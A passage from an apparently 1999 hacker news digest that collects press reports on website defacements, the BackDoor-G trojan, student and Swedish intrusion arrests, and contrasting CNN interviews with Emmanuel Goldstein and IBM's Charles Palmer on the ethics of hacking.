- altered overnight Sunday for a few minutes before government computers automatically detected the intrusion.
-
- The grand jury also accused Burns of breaking into two other computers, one owned by LaserNet of Fairfax,
- Va., and the other by Issue Dynamics Inc. of Washington.
-
- CNN;
-
-
-
- Hackers react to FBI
- crackdown by invading
- Senate Web site
-
- May 27, 1999
- Web posted at: 11:04 p.m. EDT (0304 GMT)
-
- WASHINGTON (CNN) --
- Computer hackers reacted to an FBI crackdown by launching cyber assaults
- Thursday on government Web sites, including the one belonging to the U.S.
- Senate.
-
- People calling up the Senate Web site on Thursday were redirected to one
- belonging to the hackers. Posted on the site under the hackers' logo was
- the question: "Who laughs last?"
-
- The cyber intruders wrote that their Internet invasion of the legislative site
- was a way for them to thumb their noses at the FBI.
-
- Federal agents earlier this week executed search warrants on
- suspected hackers' homes in Dallas, Houston and other locations. FBI
- sources did not specify if anyone was arrested, but said they believe word of
- the raids quickly spread in the computer community.
-
- That attempt to crack down on computer hackers preceded a seemingly
- coordinated cyber attack that overloaded the FBI's own Web site, forcing
- the agency to shut down the site, officials said Thursday.
-
- FBI officials said their site was besieged with computer hits by scores of
- computer users who were apparently outraged over the raids.
-
- No virus was planted in the FBI site, but the sheer number of hits overloaded
- the system, said FBI spokesman Frank Scafidi, who described the incident as a
- "denial of service attack."
-
- He said the system has been shut down temporarily so additional firewalls
- can be erected to protect it. It was unclear when the site would be back up.
-
- The FBI's site contains general information about the agency and does not
- house sensitive information.
-
- Justice Correspondent Pierre Thomas contributed to this report.
-
-
- @HWA
-
- 17.0 Backdoor-G a new 'backorifice like' trojan and BO2K
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- From HNN http://www.hackernews.com
-
- Back Orifice, NetBus, and now BackDoor-G
-
-
- contributed by N4vi11Us
- Yet another Trojan horse that leaves MS Windows systems wide open has been discovered.
- This new backdoor tool is similar to Back Orifice or NetBus. NetBus is now a commercial
- shareware product. Back Orifice has undergone a major rewrite and a new version, BO2K,
- is expected to be released at this years DefCon hacker convention. Once a a system has
- had any one of these programs installed they become wide open to unknown remote users
- who have complete control over the system.
-
- MSNBC
- ZD Net
-
-
- From MSNBC; http://www.msnbc.com/news/274094.asp
-
- New Back Orifice-like Trojan found
- BackDoor-G allows remote access to victimÆs PC; Trojan
- horse arrives as spam with screen saver or game update
- By Bob Sullivan
- MSNBC
-
- May 27 ù Security researchers at Network
- Associates Inc. say they have found another
- Back Orifice-like Trojan Horse hack tool called
- BackDoor-G. The Trojan horse arrives in a
- userÆs e-mail posing as a screen saver or game
- update, but once executed, it turns the victimÆs
- PC into an ôopen client.ö Then, a hacker can
- add, delete, move or execute files on the victimÆs
- computer at will from anywhere on the Internet.
-
- BACKDOOR-G IS BEING SENT out in spam mail,
- according to Sal Viveros, group marketing manager at
- Network Associates. The company discovered it
- Wednesday.
- Updated versions of virus scanning software, including
- Network Associates products, will detect BackDoor-G and
- clean it from a victimÆs system.
- Such ôremote administration toolsö started to surface
- last year when Back Orifice was released by a group calling
- itself the Cult of the Dead Cow. NetBus, another such tool,
- has since been developed into a commercial product by its
- author. With both programs, a victim is tricked into
- executing an e-mail attachment which then opens his PC to
- remote connections via the Internet. Once a victim is
- infected, a hacker can do anything to a machine that the
- victim can ù included erasing all files or copying all files.
- Such tools represent a dangerous blending of what
- might once have been considered relatively harmless pranks
- by virus writers and hackers, Viveros said
- ôWeÆre seeing these types of malicious code attacks,
- which are trying to attack information directly or indirectly,ö
- he said. ôNow weÆre seeming to blur the lines between
- malicious code attacks and [data] vulnerability.ö
- BackDoor-G already has a variant ù a very similar
- Trojan named ôArmageddonö was discovered in France this
- morning.
- Several Network Associates clients opened the
- attachment and exposed their systems, Viveros said. But
- when the promised screen saver did not execute, they called
- the virus company.
-
- @HWA
-
-
- 18.0 [CNN] A Q&A with Emmanuel Goldstein, editor of 2600 magazine
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- I didn't see a date on the following interviews but they appear fairly timeless
- so since I just found them I thought i'd share em with you...- Ed
-
- http://www.cnn.com/TECH/specials/hackers/qandas/
-
- Q&A with Emmanuel Goldstein of
- 2600: The Hacker's Quarterly
-
- (CNN) -- Emmanuel Goldstein is the editor-in-chief
- of 2600: The Hacker Quarterly and hosts a weekly
- radio program in New York called "Off the Hook."
-
- 1. How do you define hacking?
-
- Hacking is, very simply, asking a lot of
- questions and refusing to stop asking. This
- is why computers are perfect for inquisitive
- people -- they don't tell you to shut up
- when you keep asking questions or inputting
- commands over and over and over. But
- hacking doesn't have to confine itself to
- computers. Anyone with an inquisitive mind,
- a sense of adventure and strong beliefs in
- free speech and the right to know most
- definitely has a bit of the hacker spirit in
- them.
-
- 2. Are there legal or appropriate forms of
- hacking?
-
- One of the common misconceptions is that
- anyone considered a hacker is doing
- something illegal. It's a sad commentary on
- the state of our society when someone who
- is basically seeking knowledge and the truth
- is assumed to be up to something nefarious.
- Nothing could be further from the truth.
-
- Hackers, in their idealistic naivetΘ, reveal
- the facts that they discover, without
- regard for money, corporate secrets or
- government coverups. We have nothing to
- hide, which is why we're always relatively
- open with the things we do -- whether it's
- having meetings in a public place or running
- a system for everyone to participate in
- regardless of background. The fact that we
- don't "play the game" of secrets also makes
- hackers a tremendous threat in the eyes of
- many who want to keep things away from
- the public.
-
- Secrets are all well and good, but if the
- only thing keeping them a secret is the fact
- that you say it's a secret, then it's not
- really a very good secret. We suggest using
- strong encryption for those really interested
- in keeping things out of the hands of
- outsiders. It's interesting also that hackers
- are the ones who are always pushing strong
- encryption -- if we were truly interested in
- getting into everyone's personal affairs, it's
- unlikely we'd try and show them how to
- stay secure. There are, however, entities
- who are trying to weaken encryption.
- People should look toward them with
- concern, as they are the true threat to
- privacy.
-
- 3. What in your mind is the purpose of
- hacking?
-
- To seek knowledge, discover something
- new, be the first one to find a particular
- weakness in a computer system or the first
- to be able to get a certain result from a
- program. As mentioned above, this doesn't
- have to confine itself to the world of
- computers. Anyone who's an adventurer or
- explorer of some sort, or any good
- investigative journalist, knows the feeling of
- wanting to do something nobody has ever
- done before or find the answer despite
- being told that you can't. One thing that all
- of the people involved in these endeavors
- seem to share is the feeling from outsiders
- that they're wasting their time.
-
- 4. Are you a hacker? Why? Or why not?
-
- Absolutely. It's not something you can just
- erase from your personality, nor should you
- want to. Once you lose the desire to mess
- around with things, tweak programs and
- systems, or just pursue an answer doggedly
- until you get a result, you've lost a very
- important part of yourself. It's quite
- possible that many "reformed" hackers will
- lose that special ingredient as they become
- more and more a part of some other entity
- that demands their very souls. But for those
- who can resist this, or figure out a way to
- incorporate "legitimacy" into their hacker
- personalities without compromising them,
- there are some very interesting and fun
- times ahead.
-
- 5. What kind of hacking do you do?
-
- My main interest has always been phones
- and rarely does a day pass when I don't
- experiment in some way with a phone
- system, voice mail system, pay phone, or
- my own telephone. I've always been
- fascinated by the fact that we're only a
- few buttons away from virtually anyone on
- the planet and I hope that I never lose that
- sense of marvel.
-
- One of the most amazing things I ever got
- involved in was routing phone calls within
- the network itself -- known as blue-boxing.
- You can't do that as easily any more, but it
- was a real fun way to learn how everything
- was connected -- operators, services,
- countries, you name it. And in the
- not-too-distant past, there were so many
- different sounds phones made depending on
- where you were calling. Now they tend to
- be standardized rings, busies, etc. But the
- magic hasn't disappeared, it's just moved on
- to new things ... satellite technology, new
- phone networks and voice recognition
- technologies.
-
- Many times these new technologies are
- designed by the very people who were
- hacking the old technologies. The result is
- usually more security and systems that
- know what people will find useful. While I've
- spent a great deal of time playing with
- phones, I get the same sense of fun from
- computer systems and have invested lots of
- time exploring the Internet. It would fill a
- book to outline all of the hacker potential
- that exists out there. And, of course,
- there's radio hacking, which predates a lot
- of the current technology. It's gotten to
- the point where simply listening to a certain
- frequency has become a challenge. It's hard
- to believe that it's actually turned into a
- crime to listen to some of these
- non-scrambled radio waves. But this is the
- price we pay when people with no
- understanding of technology are the ones in
- charge of regulating it.
-
- 6. How much time do you spend at it a week?
-
- That's like asking how much time you spend
- breathing. It's always with you, you do
- more of it at certain times, but it's always
- something that's going on in your head.
- Even when I sleep, I dream from a hacker
- perspective.
-
- 7. Do you have a certain kind of site or
- "target" sites that most attract you?
-
- We don't sit around with a big map and a
- list of targets. In fact, we don't even sit
- around together. Most hacking is done by
- individuals who simply find things by
- messing around and making discoveries. We
- share that info and others add input. Then
- someone tells the press and the
- government that we're plotting to move
- satellites and all hell breaks loose.
-
- I think most of us tend to be drawn to the
- sites and systems that are said to be
- impossible to access. This is a normal
- human reaction to being challenged. The
- very fact that we continue to do this after
- so many of us have suffered so greatly
- indicates that this is a very strong driving
- force. When this finally becomes recognized
- as a positive thing, perhaps we'll really be
- able to learn from each other.
-
- 8. What, in general, do you think attracts
- people to hacking?
-
- People have always been attracted to
- adventure and exploration. Never before
- have you been able to get this without
- leaving your house and without regard to
- your skin color, religion, sex, or even the
- sound of your voice. On the Internet,
- everyone is an equal until they prove
- themselves to be a moron. And even then,
- you can always start over. It's the ability to
- go anywhere, talk to anyone, and not
- reveal your personal information unless you
- choose to -- or don't know enough not to
- -- that most attracts people to the hacker
- culture, which is slowly becoming the
- Internet culture.
-
- We find that many "mainstream" people
- share the values of hackers -- the value of
- free speech, the power of the individual
- against the state or the corporation, and
- the overall sense of fun that we embrace.
- Look in any movie where an individual is
- fighting a huge entity, and who does the
- audience without exception identify with?
- Even if the character breaks the rules, most
- people want him/her to succeed because
- the individual is what it's all about.
-
- 9. Do you know enough hackers personally to
- know what personality traits they share, if
- any?
-
- Hackers come from all different backgrounds
- and have all kinds of lifestyles. They aren't
- the geeks you see on television or the
- cyberterrorists you see in Janet Reno news
- conferences. They range in age from under
- 10 to over 70. They exist in all parts of the
- world, and one of the most amazing and
- inspiring things is to see what happens
- when they come together. It's all about
- technology, the thrill of discovery, and
- sharing information. That supersedes any
- personality issues that might be an issue in
- other circumstances.
-
- 10. Do you think hackers are productive and
- serve a useful purpose?
-
- I think hackers are necessary, and the
- future of technology and society itself
- (freedom, privacy, etc.) hinges on how we
- address the issues today that hackers are
- very much a part of. This can be the
- dawning of a great era. It can also be the
- beginning of true hell.
-
- 11. What percentage would you say are
- destructive as opposed to those in it out of
- intellectual curiosity or to test their skills?
-
- This raises several points that I feel
- strongly about. For one thing, hacking is
- the only field where the media believes
- anyone who says they're a hacker. Would
- you believe someone who said they were a
- cop? Or a doctor? Or an airline pilot? Odds
- are they'd have to prove their ability at
- some point or say something that obviously
- makes some degree of sense. But you can
- walk up to any reporter and say you're a
- hacker and they will write a story about you
- telling the world that you're exactly what
- you say you are without any real proof.
-
- So every time a movie like "Hackers" comes
- out, 10 million people from AOL send us
- e-mail saying they want to be hackers, too,
- and suddenly, every 12-year-old with this
- sentiment instantly becomes a hacker in the
- eyes of the media and hence, the rest of
- society. You don't become a hacker by
- snapping your fingers. It's not about getting
- easy answers or making free phone calls or
- logging into someone else's computer.
- Hackers "feel" what they do, and it excites
- them.
-
- I find that if the people around you think
- you're wasting your time but you genuinely
- like what you're doing, you're driven by it,
- and you're relentless in your pursuit, you
- have a good part of a hacker in you. But if
- you're mobbed by people who are looking
- for free phone calls, software or exploits,
- you're just an opportunist, possibly even a
- criminal. We already have words for these
- people and it adequately defines what they
- do. While it's certainly possible to use
- hacking ability to commit a crime, once you
- do this you cease being a hacker and
- commence being a criminal. It's really not a
- hard distinction to make.
-
- Now, we have a small but vocal group who
- insist on calling anyone they deem
- unacceptable in the hacker world a
- "cracker." This is an attempt to solve the
- problem of the misuse of the word "hacker"
- by simply misusing a new word. It's a very
- misguided, though well-intentioned, effort.
- The main problem is that when you make up
- such a word, no further definition is
- required. When you label someone with a
- word that says they're evil, you never really
- find out what the evil was to begin with.
- Murderer, that's easy. Burglar, embezzler,
- rapist, kidnapper, all pretty clear. Now along
- comes cracker and you don't even know
- what the crime was. It could be crashing
- every computer system in Botswana. Or it
- could be copying a single file. We need to
- avoid the labeling and start looking at what
- we're actually talking about. But at the
- same time, we have to remember that you
- don't become a hacker simply because you
- say you are.
-
- 12. Do people stay in hacking a long time, or
- is it the kind of thing that people do for a few
- years and then move on to something else?
-
- It can be either. I tend to believe that it's
- more of a philosophy, a way of looking at
- something. When you have the hacker
- perspective, you see potential where others
- don't. Also, hackers think of things like
- phones, computers, pagers, etc., as toys
- and things to be enjoyed whereas others
- see work and responsibility and actually
- come to dread these things. That's why
- hackers like to hold onto their world and not
- become part of the mainstream. But it
- certainly can and does happen.
-
- 13. What is the future of hacking?
-
- As long as the human spirit is alive, there
- will always be hackers. We may have a hell
- of a fight on our hands if we continue to be
- imprisoned and victimized for exploring, but
- that will do anything but stop us.
-
- 14. Given increased attention to corporate
- and government security, is it getting tougher
- to hack or not?
-
- Hacking isn't really about success -- it's
- more the process of discovery. Even if real
- security is implemented, there will always
- be new systems, new developments, new
- vulnerabilities. Hackers are always going to
- be necessary to the process and we're not
- easily bored.
-
- 15. Is the possibility of being identified and
- even prosecuted an issue for most hackers?
-
- Hackers make very bad criminals. This is
- why we always wind up being prosecuted.
- We don't hide very well or keep our mouths
- sealed shut to protect corporate or
- government interests. But the same
- security holes would exist even if we
- weren't around, so I think the hackers
- should be properly seen as messengers.
- That doesn't mean that you should expect
- them to just hand over all of their
- knowledge -- it's important to listen and
- interpret on your own, as any hacker would.
-
- 16. Are there hackers who are up for hire?
- What are they paid? Who hires them, and for
- what?
-
- Just as you can use hacker ability to attain
- a life of crime, you can use that ability to
- become a corporate success. Some are able
- to hold onto their hacker ideals. Others,
- sadly, lose them. It's especially hard when
- young people who haven't worked it all out
- yet are approached and tempted with huge
- amounts of money by these entities. It can
- be very hard to resist and the cost is often
- greater than anticipated.
-
- 17. Have you had any contact with people
- you consider cyberterrorists? Do you endorse
- what they do?
-
- In all of the time I've been in the scene,
- which is a pretty long time, I've never come
- across anyone I consider to be a
- "cyberterrorist," whatever that is. Most
- people who talk of such creatures either
- have something to sell or some bill to pass.
- This is not to say that such a concept is
- impossible. But I believe the current
- discussions aren't based in reality and have
- very suspicious ulterior motives.
-
- 18. What about the people who hack into
- Pentagon sites? Do you think they should be
- punished?
-
- According to the Pentagon, there is no risk
- of anything classified being compromised
- because it's not on the Internet. If they
- were wrong, I would like to see someone
- prove that. If a non-classified site is
- hacked, I don't see the harm unless
- something is damaged in some way.
- Remember, the security hole was already
- there. If a hacker finds it, it's far more likely
- the people running the system will learn of
- the hole. If a criminal or someone with an
- ulterior motive (espionage, etc.) finds the
- hole first, it's likely to remain secret for
- much longer and the harm will be far
- greater.
-
- While you may resent the fact that some
- 14-year-old from Topeka proved your
- security sucks, think of what could have
- happened had you not learned of this and
- had someone else done it instead. I'm the
- first to say that people who cause damage
- should be punished, but I really don't think
- prison should be considered for something
- like this unless the offender is a true risk to
- society. The great majority of these cases
- do not involve damage or vandalism, a fact
- that largely goes unreported. What people
- have to remember is that most of the time,
- this is simply an example of kids being kids
- and playing games like they have always
- done.
-
- Obviously, the tools have changed, but
- that's really not something the kids are
- responsible for. If some kid somewhere can
- access your medical records or your phone
- records, he or she is not the one who put
- them there. The true violator of your
- privacy is the person who made the
- decision to make them easily accessible.
-
- 19. Your real name is Eric Corley. Why do you
- use the name Emmanuel Goldstein?
-
- I believe everyone should be given the
- opportunity to name themselves. That name
- should reflect something about who you are
- and what you believe in and stand for.
- Emmanuel Goldstein is that for me, and for
- those who want to learn why, get a copy of
- George Orwell's "1984" and see for yourself.
- Interestingly, our first issue of 2600 was
- published in January 1984. A complete
- coincidence.
-
- 19.0 [CNN] 'Hacking is a felony': Q&A with IBM's Charles Palmer
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- http://www.cnn.com/TECH/specials/hackers/qandas/
-
-
- Q&A with IBM's Charles Palmer
-
- (CNN) -- Dr. Charles C. Palmer is the manager of
- Network Security and Cryptography and head of
- the Global Security Analysis Lab, which includes
- IBM's ethical hacking unit.
-
- 1. How do you define hacking?
-
- Hacking is unauthorized use of computer
- and network resources. (The term "hacker"
- originally meant a very gifted programmer.
- In recent years though, with easier access
- to multiple systems, it now has negative
- implications.)
-
- 2. Are there appropriate forms of hacking?
-
- Hacking is a felony in the United States and
- most other countries. When it is done by
- request and under a contract between an
- ethical hacker and an organization, it's OK.
- The key difference is that the ethical
- hacker has authorization to probe the
- target.
-
- 3. What do you and the other members of
- your team do?
-
- (We) work with IBM Consulting and its
- customers to design and execute thorough
- evaluations of their computer and network
- security. Depending on the evaluation they
- request (ranging from Web server probes to
- all-out attacks), we gather as much
- information as we can about the target
- from publicly available sources. As we learn
- more about the target, its subsidiaries and
- network connectivity, we begin to probe for
- weaknesses. Examples of weaknesses
- include poor configuration of Web servers,
- old or unpatched software, disabled
- security controls, and poorly chosen or
- default passwords. As we find and exploit
- vulnerabilities, we document if and how we
- gained access, as well as if anyone at the
- organization noticed. (In nearly all the
- cases, the Information Syhstems
- department is not informed of these planned
- attacks.) Then we work with the customer
- to address the issues we've discovered.
-
- 4. What is the background of the people on
- your team?
-
- We have Ph.D.s in physics, computer
- scientists, and even one former
- photographer with a fine arts degree. They
- are all well-known, highly respected system
- security professionals from around the
- world. Most of them did not start their
- careers in this area, but ended up doing
- computer and network security because
- they were provoked by hackers at one time.
- Once they started on the road to improving
- security, they got hooked on the challenges
- it presents.
-
- 5. In "Helpful Hacking" from IBM Research
- magazine in 1997, you are quoted as saying
- you don't hire reformed hackers and "there's
- no such thing." Could you explain?
-
- The number of really gifted hackers in the
- world is very small, but there are lots of
- wannabes.... When we do an ethical hack,
- we could be holding the keys to that
- company once we gain access. It's too
- great a risk for our customers to be put in a
- compromising position. With access to so
- many systems and so much information, the
- temptation for a former hacker could be too
- great -- like a kid in an unattended candy
- store.
-
- 6. Is it fair to say that you are opposed to
- hacking?
-
- As I said before, hacking is a felony -- for
- good reason. Some of the "joyriders" --
- hackers who access systems just for the
- challenge -- think it's harmless since they
- usually don't "do" anything besides go in
- and look around. But if a stranger came into
- your house, looked through everything,
- touched several items, and left (after
- building a small, out of the way door to be
- sure he could easily enter again), would you
- consider that harmless? These joyriders
- could be causing damage inadvertently
- since just by their presence they are using
- system resources.
-
- 7. Do you think hacking can be useful?
-
- Hacking can be useful in a controlled
- environment where there are ground rules
- and contractual agreements.
-
- 8. Do you have a profile of the typical hacker?
-
- The profile has broadened in the last couple
- of years to include many types of people,
- which makes it very difficult to call out a
- "typical" hacker. The motivations behind
- hacking have changed (see Answer No. 11
- below). No longer are hackers limited to the
- teen-age, soda-slurping misfits, although
- they're probably the majority. There are
- girls and even younger kids. Many
- companies think all hackers come from
- outside, but surveys continue to show that
- the threat from inside an organization is
- greater than from outside. So if your
- system is compromised, it could be a
- Gen-Xer sitting in a dark apartment, or the
- woman in the cubicle next to you.
-
- 9. There have been reported instances where
- corporate security personnel have tracked
- hacking back to the source, broken in and
- stolen computers, or even used force. Do you
- endorse "vigilantism" as a response to
- hacking?
-
- I've heard those stories, too, and I don't
- believe most of them. It makes zero sense
- to respond to an illegal attack with another
- illegal attack. First of all, it can be very
- difficult to accurately determine where an
- attack comes from. Whether they end up
- retaliating against the right or wrong
- person, they've committed a felony and are
- just as guilty as the original perpetrator. It's
- no different than other forms of vigilante
- justice.
-
- 10. What about attacking Web sites that list
- hacking scripts?
-
- Again, any attack is a felony. It's a First
- Amendment rights issue as well. Where do
- you draw the line? Attacking adult sites?
- Attacking spammers? It makes more sense
- for corporations, schools and other
- organizations to try to block access to
- those sites.
-
- 11. Can you characterize the nature of most
- hacking attacks?
-
- A few years ago, the original motivations
- were pursuit of knowledge and the desire to
- "show off" one's skills. Now, there are new
- lures of money and power. However, the
- statistics can be misleading, so many of
- these incidents go unreported due to lack
- of detection or fear of further losses due to
- tarnished image and credibility.
-
- I believe that the majority of hacks are still
- motivated by curiosity and a desire to point
- out system weaknesses. However, as
- organizations have been finding, most of
- today's threats come from within the
- organization. According to a recent META
- Group study, current figures indicate that
- recent breaches of security within
- Information Technology organizations occur
- internally 58 percent of the time. The
- threat from the outside is rising at a steady
- rate, though.
-
- 12. Is there a trend in these attacks?
-
- Denial-of-service attacks and macro-viruses
- are the most popular hacker activities. The
- denial-of-service attacks are fairly easy for
- hackers of all skill levels -- from "script-kids"
- to professionals -- to launch. This is a
- situation where a company's Web site or
- online service is simply made unavailable by
- a hacker overtaxing the system resources.
- It doesn't sound that harmful, but there can
- be serious monetary and image losses
- attached to this. If you want to buy a book
- and you go to a popular book-selling Web
- site and find that site unavailable, chances
- are you'll try the next most popular book
- Web site. There's simply too much
- competition on the Internet right now to
- overlook security needs. These
- denial-of-service attacks are particularly
- troubling because they are hard to defend
- against. There are defenses available with
- firewall products from IBM and other
- companies, but there can be
- denial-of-service attacks from inside as
- well, which lends credence to the argument
- for Intranet firewalls.
-
- 13. Where does the real threat of hacking lie:
- in the private sector, in government or
- somewhere else?
-
- The widely reported attacks against
- government sites are troubling, but it's a
- good bet that the government would not
- have any sensitive information on a machine
- connected to the Internet. An unfortunate
- side effect of these reports is that people
- end up thinking that securing systems and
- networks is hard. It's not hard, but it does
- take time and training, and it's an ongoing
- process to stay one step ahead of the bad
- guys.
-
- Corporate espionage is also a threat, but
- not in the glamorous way portrayed in the
- movies. There, the threat is from the inside.
- There have been many reports of
- employees purposely sending proprietary
- information outside the company to other
- companies, perhaps just before they
- themselves move to that company. The
- greater connectivity that employees have
- today also leads them to inadvertent leaks
- via e-mail.
-
- 14. To what extent is cyberterrorism a
- genuine concern?
-
- There is little motivation for industrial
- control systems like those running nuclear
- plants or airports to be on the open Web.
- They may have dial-up access or private
- networks within the organization that would
- be susceptible to attack from the inside.
- IBM has found that it can be quicker and
- cheaper to attack a target physically,
- rather than digitally -- we've nonchalantly
- walked into businesses, snooped around,
- and walked out with confidential material
- (once with the security guard holding the
- door for us!). And there are many examples
- of unfortunate accidents that resulted in
- very effective "attacks." The most common
- example is the "backhoe attack," where an
- errant heavy-equipment operator
- accidentally cut a communications cable.
-
- ... I don't think we are "at war," because in
- this problem the enemy includes ourselves.
- We view it more as a race -- we're all trying
- to stay a few steps ahead of the threats ...
- through improved education and
- technology. ... The good news is that
- people are thinking about these issues, and
- some groups appear to be taking action.
-
- 15. What about responses such as the recent
- Pentagon counteroffensive that redirected
- hackers' attack to an applet that caused their
- browsers to crash? Is that an appropriate
- response to hackers?
-
- Anytime you acknowledge the hacker, you
- run the risk of heightening his or her
- interest. If you change the game from
- solitaire to a real poker game with human
- opponents, it becomes more interesting to
- most hackers. Such retaliation is also
- short-lived, since countermeasures will
- quickly be developed and publicized around
- the Web. In my opinion, this is not an
- effective usage of limited security
- personnel.
-
- 16. Are anti-hacking measures improving?
-
- The most important improvement is in the
- area of awareness. ... Advances in firewall
- technology (making them easier to install
- and configure), improvements in
- vulnerability scanning and better
- explanations of how to repair them, and
- better intrusion-detection with fewer
- false-positives are all key technologies in
- this race.
-
- 17. If attacks can only take place on
- computers that are online, to what extent
- could hacking be mitigated by keeping
- sensitive materials, data, etc., offline?
-
- One of my colleagues at IBM likes to say,
- "only trust physics." My version is that the
- only 100 percent, truly secure system is
- one that is powered-off and filled with
- concrete. The military has long understood
- the security of an "air gap" (where a secure
- machine has no connection whatsoever to
- an unsecured machine), and we recommend
- to our customers that they consider such
- an arrangement for their most secure
- systems. This comes down to risk-analysis
- -- that is, weighing the cost in convenience
- and availability against the threat of having
- a system online.
-
- If it's important to ... your business to have
- data available online inside the company,
- then protecting it with an internal firewall
- makes sense. ... If you have a Web server
- you want your customers to access, you
- can't hide it behind your corporate firewall
- because they won't be able to get to it.
- There are network designs that will enable
- you to position the Web server on the
- "outside," while securely maintaining a
- connection between it and, perhaps, a
- server behind the firewall.
-
- 18. What is the long-term outlook for
- hacking?
-
- As long as there are unsecured computers
- with interesting stuff on them, there will be
- hackers. Law enforcement agencies have
- stepped up their facilities and training
- programs to meet the demand for computer
- and network security.
-
- Moving toward technologies that use strong
- encryption will greatly improve the overall
- security of systems. Virtual Private
- Networks are a fantastic tool for companies
- and governments to protect their systems
- and networks while taking advantage of the
- low-cost, high-availability offered by the
- Internet. Internet standards bodies are also
- moving toward designing security into new
- standards.
-
- Most kids today know much more about
- computers than their parents do, and some
- start "messing around" at earlier ages than
- in the past. The best thing we can do is to
- show them how interesting it can be to
- work at protecting systems and networks.
-
- 19. What about the outlook for computer
- security?
-
- While better security technologies are
- appearing all the time, education and
- awareness will continue to be the limiting
- factor. System administrators must learn
- about and maintain their systems securely.
- Users have to understand their security
- responsibilities (like choosing good
- passwords, not installing unauthorized
- modems, etc.). ... Innovations like
- biometrics and smart cards will go a long
- way toward making security easier for the
- end user as well as for the system
- administrators.
-
-
- @HWA
-
- 20.0 Five Busted in Florida
- ~~~~~~~~~~~~~~~~~~~~~~
-
- From HNN http://www.hackernews.com
-
- contributed by squid stupid
- It has been hard to nail down specific information but a
- few local news outlets in Florida are reporting that four
- students of Flagler Palm Coast High School may face a
- slew of criminal charges for unlawful computer access.
- The suspects have been accused of deleting grade files
- and compromising exams on their school computer system.
-
- Yahoo News
- http://dailynews.yahoo.com/headlines/local/state/florida/story.html?s=v/rs/19990526/fl/index_6.html#11
-
- Student Hackers Arrested - (BUNNELL) -- Five Flagler Palm Coast High School
- students... including the son of a Bunnell city commissioner... are facing a
- litany of criminal charges after allegedly using a computer virus to hack into
- the school's network and commandeer files. No grades were changed but grade files
- were deleted and exams compromised. The virus was discovered last month during a
- software upgrade. The school's computer experts also found that each of the five
- students had downloaded a ``hacker tool'' from the Internet into their personal
- computer accounts. They're been suspended for the rest of the year... but the
- students will be allowed to take their final exams next month. Prosecutors have
- not decided if they will file criminal charges.
-
-
- From ISN mailing list
-
- Date: Thu, 27 May 1999 02:58:09 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: [ISN] Five arrested for hacking into high school system
-
-
- Forwarded From: bluesky@rcia.com
-
-
- May 26, 1999
-
-
- Five arrested for hacking into high school system
- By MATT GOWEN
-
-
- BUNNELL - Five Flagler Palm Coast High School students - one the son of a
- Bunnell city commissioner - are facing a litany of criminal charges after
- authorities said they used a computer virus to hack into the school's
- network and commandeer teacher and student files.
-
-
- Flagler County sheriff's deputies arrested the students Monday. All five
- were taken to the Division of Youth Services in Daytona Beach before being
- released to their parents.
-
-
- Facing the brunt of the allegations are Steven Alverson, 17, and Daniel
- Bixby, 16, both of Palm Coast. Alverson was charged with 16 separate
- felony counts, eight for crimes involving computers and eight for crimes
- against computer users. Bixby was charged with 12 similar counts. Alverson
- and Bixby were suspended until the end of the school year, June 4.
-
-
- Arrested on two felony charges each were Yen Chen, 16, and Henry
- Cervantes, 17, both of Palm Coast, and Daniel Dupont, 17, of Bunnell, son
- of City Commissioner Catherine Robinson. School officials gave Chen,
- Cervantes and Dupont in-school suspension until the end of the year.
-
-
- The five will be allowed to return to take final exams June 7 and 8.
-
-
- As for the criminal case, the State Attorney's Office will now decide
- whether formal charges should be filed.
-
-
- The arrests capped a lengthy investigation into the presence of the virus
- - a disabling computer program that gave the students access to teacher
- grade books and to exams on the system, according to reports.
-
-
- The virus was initially discovered April 8 by technology support
- personnel who were upgrading the school's protective software. In a
- subsequent investigation, reports said, the school's computer experts
- found that each of the five students had downloaded a "hacker tool" from
- the Internet into their personal computer accounts.
-
-
- FPCHS Assistant Principal Allan Haller said no grades were changed but
- that grade files were deleted and exams were compromised.
-
-
- "It was more mischievous than anything else," Haller said.
-
-
- Still, he said, the high school's computer network connects to the
- districtwide system, meaning the students could have eventually broken
- into financial and payroll records or general personnel files.
-
-
- "It could have been very disruptive," Haller said. "They could have shut
- down the whole system."
-
-
- The arrested students either preferred not to comment or could not be
- reached for comment.
-
-
- Robin Alverson, Steven Alverson's mother, said her son insisted he was
- innocent of any criminal wrongdoing and offered to take a lie detector
- test or voice-stress analysis to prove it.
-
-
- "Steven is very computer literate," Robin Alverson said. "He is not
- stupid. He knows that anything he does on there can be traced. That's the
- thing that gets me."
-
-
- One of their classmates, who asked not to be identified, said he thought
- the group had simply downloaded games off the Internet and that one had a
- virus attached to it.
-
-
- But sheriff's reports describe a highly technical process - set in motion
- Jan. 4 - involving hidden and renamed viruses that blocked administrators'
- access to their files, making the path more difficult to trace.
-
-
- "These students were very good," Flagler County School Superintendent
- Robert Williams said, alleging that they viewed breaking into the system
- as a challenge or game. "They were running our people ragged trying to
- keep up with them."
-
-
- Williams added that it was the first time the district has dealt with
- unauthorized internal computer access, and that the disciplinary code will
- be revamped accordingly over the summer.
-
-
- The high school has four classroom computer labs, and Haller estimated
- the school has more than 100 computers that connect to the Internet.
-
-
- In the fall, each student is given his or her own password-protected
- computer account to do research or work on word processing programs.
- Students and parents must sign an agreement on proper use.
-
-
- "Some of them choose to use their talents inappropriately," Haller said,
- adding that peer pressure may have played a role. "Whether it's a macho
- thing, whether it was a battle over school territory or whether they were
- out to prove a point - 'We're smarter than you' - it's hard to say."
-
-
- And as recent news reports demonstrate, even large agencies such as NASA
- are not insulated from the potential for break-ins.
-
-
- "We're a high school," Haller said. "We don't begin to have the kinds of
- resources that the federal government has for protection."
-
-
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
-
- @HWA
-
- 21.0 Danes Finger Swede for Cracking 12,000 Systems
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- From HNN http://www.hackernews.com
-
- contributed by Phoz
- The Danish Police Computer Crime Unit have exposed a 17-year old from Sweden
- claiming that he broke into at least 12,000 computers worldwide, including
- military, bank, and university owned systems. The reports indicate that he
- used an automated version of a BIND vulnerability to gain access and has been
- compromising systems since early 1997.
-
- phoz.dk- Translated News Reports.
